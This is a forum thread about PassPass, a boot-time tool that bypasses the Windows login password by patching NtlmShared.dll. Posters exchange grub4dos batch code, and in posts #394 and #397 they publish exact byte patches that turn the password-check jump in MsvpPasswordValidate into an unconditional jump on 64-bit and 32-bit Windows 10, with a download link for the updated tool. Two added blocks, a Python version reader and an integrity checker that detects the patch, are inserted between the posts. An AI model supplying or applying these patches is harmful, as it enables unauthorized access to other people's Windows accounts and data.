
PassPass - Bypass the Password


430 replies to this topic

#376 ner0

Posted 04 December 2016 - 01:57 PM

I tested Chenall's version, but auto-detection didn't work for me; it always returned "No Windows installation found!", twice.

Manually passing the disk and volume as arguments worked for the patching options, but booting from the menu wouldn't work either, giving the error "The selected disk does not exist". Not sure why auto-detection does not work.

 

EDIT: I think I'm starting to understand why it wasn't working: I must manually tell the script the max number of disks/partitions? This makes little sense to me; why isn't it determined programmatically? Or am I not understanding it correctly? What about this comment:

:: only checking the directory prefix with 'win'

If that really is the case, then why bother?


Edited by ner0, 04 December 2016 - 02:48 PM.


#377 Wonko the Sane

Posted 04 December 2016 - 04:09 PM

Naaah, Chenall's version is a ("better" ;)) wenv-less version of the original PassPass by Holmes.Sherlock; some of the comments are left-overs from the latter version (and some are left-overs of previous experimental versions).

The "base" is the result of:
find --devices=h
If, for whatever reason, the output of the above does not include your hard disk partition with the Windows install, it's game over.
Then the :autoloop calls the :findDLL for each device found, and the :findDLL calls the :isWinDir for each directory in the root of each device.
:unsure:

Maybe you have a peculiar setup? :dubbio:
Chenall's version worked fine last time I tested it.

:duff:
Wonko

#378 ner0

Posted 04 December 2016 - 04:38 PM

find --devices=h

returns two results:

(hd0,1)

(hd0,0)

 

(hd0,1)/Windows is where the OS is located, afaik there's nothing peculiar about it at all.

If I call the script with max hd and volume numbers then it will iterate through them and find it.



#379 Wonko the Sane

Posted 04 December 2016 - 04:52 PM

> (hd0,1)/Windows is where the OS is located, afaik there's nothing peculiar about it at all.
>
> If I call the script with max hd and volume numbers then it will iterate through them and find it.


Yep, there is an exclusion for the boot drive, maybe that is the issue in your case:

if exist BOOTDEV goto :skipBoot
if "%?_BOOT:~0,4%"=="%dev:~0,4%" goto %0		## Prevents searching boot device

:duff:

Wonko



#380 ner0

Posted 04 December 2016 - 04:58 PM

That's probably it, I was running the script from the same device and volume as Windows.

But I still don't understand how it iterates through folders. Does it go through all top level folders or just the ones that start with "win"?



#381 Wonko the Sane

Posted 04 December 2016 - 05:21 PM

> That's probably it, I was running the script from the same device and volume as Windows.
>
> But I still don't understand how it iterates through folders. Does it go through all top level folders or just the ones that start with "win"?

All top-level folders: it calls the :isWinDir for all the output of ls on the devices, one at a time:

ls %dllRoot%/ | call :isWinDir=

To easily check whether that (the boot device) is the issue, re-map it to another device, *like*:

map (hd0) (hd2)

map --hook

before running the batch.

 

:duff:

 

Wonko



#382 steve6375

Posted 04 December 2016 - 06:28 PM

I have found that the routine which reads the version number one byte at a time can take several seconds, using cat --length=1 each time.

The speed can be halved if we skip the 0 Unicode byte by using an increment of 2 instead of 1.

 

:fnext
if "%char%"=="." set version=%version%%%char%
set /a counter=%counter%+2 > nul
if "%counter%"=="30" goto :next
goto :loop


  • ner0 likes this

#383 ner0

Posted 04 December 2016 - 06:32 PM

> The speed can be halved if we skip the 0 unicode byte by using an increment of 2 instead of 1

 

Good idea!



#384 Wonko the Sane

Posted 04 December 2016 - 06:39 PM

> Good idea!

Hey guys, the "best" (from the point of view of actual batch scripting) is obviously the version by Chenall (which, though, only checks for majmin, doing skip 1,3,5); the new "base" should IMHO be that one.

Additionally, he uses a Temp location, using the 00 as "C terminator".

:: Only get majmin version
dd if=%file% of=%Temp% bs=1 skip=%offbase% count=32 > nul
cat --skip=1 %Temp% | set majmin=
cat --skip=3 %Temp% | set majmin=%majmin%
cat --skip=5 %Temp% | set majmin=%majmin%

This should be the "full version" loop using the same technique:

:: Get full version
dd if=%file% of=%Temp% bs=1 skip=%offbase% count=32 > nul
set /a counter=1 > nul
set majmin3=
:version_loop
cat --skip=%counter% %Temp% | set majmin3=%majmin3%
if "%majmin3:~-1,1%"==" " set majmin3=%majmin3:~0,-1% && goto :outofloop
set /a counter=%counter%+2 > nul
goto :version_loop

:outofloop

:duff:

Wonko
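As an added illustration (not code from the thread, from PassPass or from Chenall's script), here is the same stride-2 read from posts #382 and #384 done in Python on a constructed byte buffer instead of with grub4dos dd/cat. It assumes the 32-byte window is taken one byte before the first UTF-16LE character of the FileVersion string, so that the skip=1/3/5 reads land on characters, and it stops at a 00 byte or at the end of the window as well as at the space, which the batch loop does not.

```python
# Added example: the stride-2 UTF-16LE version read from posts #382/#384,
# done in Python on a constructed buffer rather than with grub4dos dd/cat.
# Assumption: `offbase` points one byte BEFORE the first UTF-16LE character,
# so the string starts at window offset 1 (as the cat --skip=1/3/5 reads need).

WINDOW = 32  # dd ... count=32 in the batch

# Constructed sample resource bytes: a 00 byte, then the FileVersion string as
# Windows stores it in VS_VERSION_INFO (UTF-16LE), then its 00 00 terminator.
SAMPLE_RESOURCE = (
    b"\x00"
    + "10.0.19041.1 (WinBuild.160101.0800)".encode("utf-16-le")
    + b"\x00\x00"
)


def read_window(data: bytes, offbase: int, size: int = WINDOW) -> bytes:
    """Equivalent of `dd if=%file% of=%Temp% bs=1 skip=%offbase% count=32`."""
    return data[offbase:offbase + size]


def char_at(window: bytes, skip: int) -> str:
    """Equivalent of `cat --skip=N %Temp% | set var=`: one character, or '' when
    the byte is 00 (the 'C terminator' from post #384) or past the window end."""
    if skip >= len(window) or window[skip] == 0:
        return ""
    return chr(window[skip])


def majmin(window: bytes) -> str:
    """The three fixed reads at skip 1, 3 and 5: on this constructed layout they
    pick the first three characters, skipping the high byte of each code unit."""
    return "".join(char_at(window, skip) for skip in (1, 3, 5))


def read_chars(window: bytes, start: int = 1, stride: int = 2) -> str:
    """Walk the window from `start` in steps of `stride`. A stride of 2 skips the
    00 high byte of every UTF-16LE code unit (the halving from post #382).
    Stops at a 00 byte or the end of the window, so it cannot spin forever on a
    string that has no space within the window."""
    chars = []
    pos = start
    while pos < len(window):
        c = char_at(window, pos)
        if c == "":
            break
        chars.append(c)
        pos += stride
    return "".join(chars)


def full_version(window: bytes) -> str:
    """Post #384's :version_loop: collect characters up to the space that
    separates the version from the ' (WinBuild...)' tail, and drop the space."""
    return read_chars(window).split(" ", 1)[0]


if __name__ == "__main__":
    w = read_window(SAMPLE_RESOURCE, 0)
    print("skip 1,3,5 reads:", majmin(w))        # 10.
    print("full version    :", full_version(w))  # 10.0.19041.1
```

The window is bounded, so a FileVersion string that carries no space within the first 32 bytes (a short 6.x-style "6.1.7601.17514" followed directly by its terminator, for instance) ends the walk at the 00 byte instead of looping.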



#385 mizzcrazi

Posted 20 September 2019 - 11:18 AM



#386 steve6375

Posted 04 August 2021 - 09:19 AM

It seems Windows 10 21H1 has changed the ntlmshared.dll code, and PassPass no longer works on this new version.

I have looked at the new code with IDA, and the new subroutine seems a lot more complex; I cannot figure out what to patch. I suspect it needs to be patched in more than one place...



#387 ner0

Posted 04 August 2021 - 11:24 AM

Can you share NtlmShared.dll from 21H1?



#388 steve6375

Posted 04 August 2021 - 11:27 AM

Password is passpass

 

Attached Files



#389 ner0

Posted 04 August 2021 - 11:42 AM

Which was the last version that you had compatibility with, Win10 1909?

 

Apparently this file is the same since Win10 2004/20H2/21H1.

 

I stopped looking at this since Win10 1607, but I might try to take a look at it when I have some spare time.



#390 steve6375

Posted 04 August 2021 - 11:44 AM

I don't know when it changed; I haven't tested it for ages.

Is Win11 the same?



#391 ner0

Posted 04 August 2021 - 11:54 AM

Not sure; I haven't tried Windows 11 and have no plans to, it seems to be too much of a hassle at the moment.

 

I also haven't looked at this in a long time; according to Wikipedia, it might have changed in one of these releases:

  • 1703 (Creators Update)
  • 1709 (Fall Creators Update)
  • 1803 (April 2018 Update)
  • 1809 (October 2018 Update)
  • 1903 (May 2019 Update)
  • 1909 (November 2019 Update)
  • 2004 (May 2020 Update)

But still, that doesn't really solve the issue.

It would be cool if someone more experienced with assembly could have a look; I'll give it a try at a later time, but if it really is as drastically different as you stated then I probably won't make any progress either.


Edited by ner0, 04 August 2021 - 11:55 AM.


#392 steve6375

Posted 04 August 2021 - 12:00 PM

The same subroutine is there, but it is way more complicated with jumps all over the place!

 

Attached Thumbnails

  • pwdvalidatecode.JPG


#393 ner0

Posted 04 August 2021 - 12:09 PM

I don't have IDA on the machine I'm on, but it seems to be very different indeed. Traditionally the NOP would just be placed in the jne (or jnz), which in this version is located at 0x8835, but it's a straight je (or jz) with pattern 0F 84 BA FA FF FF; I doubt NOPing this does the trick.



#394 ner0

Posted 05 August 2021 - 01:21 AM

New NtlmShared.dll file version:

  • Windows 10 Pro (x64) v20H1/v20H2/v21H1
  • NtlmShared.dll v10.0.19041.1
  • MD5: 68A29D04B882CD44F52590F6E5944320
  • SHA-1: 8251967983CF1E30A94C206AD60A3F6452D22ABD

Here I've had success by patching the conditional jump into an unconditional one instead, 6 bytes at address 0x8835:

  • Originally: 0F 84 BA FA FF FF
  • Patched: E9 BB FA FF FF 90

 

 

Graphical view from MsvpPasswordValidate function (image)

Text view from MsvpPasswordValidate function (image)

Hex view for the jump (JZ) to be patched in MsvpPasswordValidate function (image)
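An added integrity check, written here as an example and not taken from the thread or from PassPass: it hashes a copy of NtlmShared.dll, compares the result with the MD5/SHA-1 ner0 quotes above for the 10.0.19041.1 x64 build, and inspects the six bytes at 0x8835 for either the original JZ or the rewritten JMP. It assumes the offset quoted above is a raw file offset (as in the hex view) and that the x64 build is the one under examination; for any other build only a hash comparison against a trusted copy is meaningful. The sample buffers are constructed stand-ins, not real DLLs.

```python
# Added example (not from the thread or from PassPass): a defender-side
# integrity check for NtlmShared.dll, using only values quoted in this thread.
import hashlib
import os

# Known-good hashes ner0 posted for NtlmShared.dll 10.0.19041.1 (x64).
KNOWN_GOOD = {
    "md5": "68a29d04b882cd44f52590f6e5944320",
    "sha1": "8251967983cf1e30a94c206ad60a3f6452d22abd",
}

# Jump site and byte patterns quoted for the x64 build.
# Assumption: 0x8835 is a raw file offset, as shown in the hex view.
JUMP_OFFSET = 0x8835
ORIGINAL_JZ = bytes.fromhex("0F84BAFAFFFF")   # je/jz rel32 (original)
PATCHED_JMP = bytes.fromhex("E9BBFAFFFF90")   # jmp rel32 + nop (tampered)


def hash_blob(data: bytes) -> dict:
    """MD5 and SHA-1 of the whole file, lowercase hex."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
    }


def classify_jump(data: bytes, offset: int = JUMP_OFFSET) -> str:
    """Look at the six bytes at the documented jump site."""
    window = data[offset:offset + len(ORIGINAL_JZ)]
    if window == ORIGINAL_JZ:
        return "original"
    if window == PATCHED_JMP:
        return "patched"
    return "unknown"  # short file or a different build


def check_ntlmshared(data: bytes) -> dict:
    """Combine the hash comparison with the jump-site check into one verdict."""
    hashes = hash_blob(data)
    hash_ok = hashes == KNOWN_GOOD
    jump = classify_jump(data)
    if hash_ok:
        verdict = "intact"          # byte-for-byte the build ner0 hashed
    elif jump == "patched":
        verdict = "tampered"        # the rewritten JMP is present
    elif jump == "original":
        verdict = "unverified"      # jump site untouched, but not the hashed build
    else:
        verdict = "unknown-build"   # compare against a trusted copy instead
    return {"hashes": hashes, "hash_matches_known_good": hash_ok,
            "jump_site": jump, "verdict": verdict}


def check_file(path: str) -> dict:
    """Run the check on a DLL copied from an offline image or system drive."""
    with open(path, "rb") as fh:
        return check_ntlmshared(fh.read())


def constructed_sample(pattern: bytes) -> bytes:
    """Constructed stand-in for a DLL: zero padding with `pattern` at 0x8835."""
    buf = bytearray(JUMP_OFFSET + 64)
    buf[JUMP_OFFSET:JUMP_OFFSET + len(pattern)] = pattern
    return bytes(buf)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target and os.path.exists(target):
        print(check_file(target))
    else:
        for name, pat in (("original", ORIGINAL_JZ), ("patched", PATCHED_JMP)):
            print(name, "->", check_ntlmshared(constructed_sample(pat))["verdict"])
```

A "tampered" verdict on a copy taken from a system drive is a finding worth following up; an "unknown-build" verdict only means the file is not the build this thread hashed, so the comparison should be repeated against a trusted reference copy of the same build (for instance from install media) rather than against these two hashes.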



#395 steve6375

Posted 05 August 2021 - 06:04 AM

Good work! It seems to work great! :)



#396 steve6375

Posted 05 August 2021 - 08:31 AM

I tried with the 32-bit version and failed :-(

 

 

Could you work your magic on this please and let me know the new bytes?

thanks

 

Attached Thumbnails

  • ntlmshared32.JPG

Attached Files



#397 steve6375

Posted 05 August 2021 - 08:50 AM

It's OK, I managed to work it out eventually after many unsuccessful attempts!

if "%majmin%"=="10.0" set patt=\xC6\x0F\x84\x63\xFB\xFF\xFF && set rpatt=\xC6\xE9\x64\xFB\xFF\xFF\x90

thanks!



#398 ner0

Posted 05 August 2021 - 08:59 AM

Nice, glad you were able to find it.

 

I had thought about it after doing it for x64, but... for one, I didn't have an x86 copy around, and I also thought that at this point people wouldn't be using 32-bit; but then again there are always some edge cases.



#399 steve6375

Posted 05 August 2021 - 08:59 AM

E2B v2.10eBeta has new PassPass with later Win10 support

https://1drv.ms/u/s!...dDg0oH?e=JRyz5R



#400 Wonko the Sane

Posted 05 August 2021 - 09:16 AM


> Here I've had success by patching the conditional jump into an unconditional one instead, 6 bytes at address 0x8835:
>   • Originally: 0F 84 BA FA FF FF
>   • Patched: E9 BB FA FF FF 90

> It's OK, I managed to work it out eventually after many unsuccessful attempts!
>
> if "%majmin%"=="10.0" set patt=\xC6\x0F\x84\x63\xFB\xFF\xFF && set rpatt=\xC6\xE9\x64\xFB\xFF\xFF\x90
>
> thanks!

 

Maybe a stupid question/doubt, but is this "universal" for all (stupid) Windows 10 (stupid) versions?

Or is this for latest-latest only?

Is there a way to check (besides maj/min versions) the versions ner0 listed?

> I also haven't looked at this in a long time; according to Wikipedia, it might have changed in one of these releases:
>
>   • 1703 (Creators Update)
>   • 1709 (Fall Creators Update)
>   • 1803 (April 2018 Update)
>   • 1809 (October 2018 Update)
>   • 1903 (May 2019 Update)
>   • 1909 (November 2019 Update)
>   • 2004 (May 2020 Update)

:duff:

Wonko





